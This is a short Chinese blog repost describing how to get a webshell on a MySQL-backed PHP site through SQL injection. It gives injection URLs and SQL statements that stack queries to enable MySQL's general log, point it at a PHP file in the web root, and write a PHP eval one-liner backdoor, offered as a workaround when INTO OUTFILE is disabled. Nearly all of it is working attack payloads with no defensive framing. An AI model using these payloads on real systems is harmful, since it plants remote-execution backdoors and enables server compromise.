mysql sql注入getshell新姿势 - 走看看

zoukankan html css js c++ java

mysql sql注入getshell新姿势

sql.php?sql=1'
报错信息为：
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) LIMIT 1' at line 1 [ SQL语句 ] : SELECT COUNT(*) AS ts_name FROM `t00ls_type` WHERE (1' ) LIMIT 1

into outfile函数禁用..无法写入一句话.利用phpmyadmin log技巧成功搞定

sql.php?sql=1);set global general_log='on';#
sql.php?sql=1);set global general_log_file='d:\wwwroot\web\1.php';#
sql.php?sql=1);select '<?php @eval($_POST[t00ls]);?>';%23

如可以多句执行，可以直接用sqlmap -sql-shell来执行就好

outfile被禁止的情况下：
show variables like '%general%';
set global general_log = on;
set global general_log_file = '/var/www/html/1.php';
select '<?php eval($_POST[cmd]);?>

查看全文

相关阅读:
EveryOne Piano
3D扫描商店
 Substance PBR Guide
C2GOASM
Unity调试外部DLL
BinaryReader优化
 IL
如何画头发
 Bitrix24
Mac查找包含指定字符串的文件

原文地址：https://www.cnblogs.com/hookjoy/p/8260754.html

Copyright © 2011-2022 走看看